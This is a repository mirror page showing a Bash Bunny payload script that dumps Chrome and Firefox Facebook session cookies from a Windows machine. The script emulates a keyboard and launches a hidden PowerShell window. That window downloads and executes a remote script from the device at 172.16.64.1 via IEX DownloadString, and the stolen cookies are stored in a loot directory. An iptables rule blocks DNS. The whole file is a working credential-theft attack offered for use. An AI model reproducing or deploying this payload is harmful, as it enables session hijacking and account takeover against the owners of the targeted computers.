hak5/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5/bashbunny-payloads.git synced 2025-10-29 16:58:25 +00:00
Code Issues Packages Projects Releases Wiki Activity
bashbunny-payloads/payloads/library/credentials/WindowsCookies/payload.txt
Sebastian Kinne 85b1bc7aca
Cleanup: Sort payloads by category
2017-04-10 13:29:17 +10:00

35 lines
1001 B
Bash
Executable File
Raw Blame History

#!/bin/bash
#
# Title: Facebook session cookies dump
# Author: oXis (inspired by illwill)
# Version: 2.1
#
# Dumps the stored session cookies from Chrome/Firefox browser by downloading a Powershell script
# then stashes them in /root/udisk/loot/FacebookSession/COMPUTER_NAME
# Credit to illwill for the BrowerCreds payload
#
# LED States
# Setup.............Setup
# Yellow............Setup RNDIS_ETHERNET
# Green.............Got Browser Creds
LED SETUP
LOOTDIR=/root/udisk/loot/FacebookSession
mkdir -p $LOOTDIR
ATTACKMODE HID
LED STAGE1
GET SWITCH_POSITION
cd /root/udisk/payloads/$SWITCH_POSITION/
# server.py can now instant bind sockets
iptables -A OUTPUT -p udp --dport 53 -j DROP
./server.py &
#Dump Chrome Cookies
RUN WIN "powershell -WindowStyle Hidden while(\$true){If(Test-Connection 172.16.64.1 -count 1 -quiet){sleep 2;IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1:8080/p'); Payload; exit}}"
LED STAGE2
ATTACKMODE RNDIS_ETHERNET
LED FINISH
Reference in New Issue View Git Blame Copy Permalink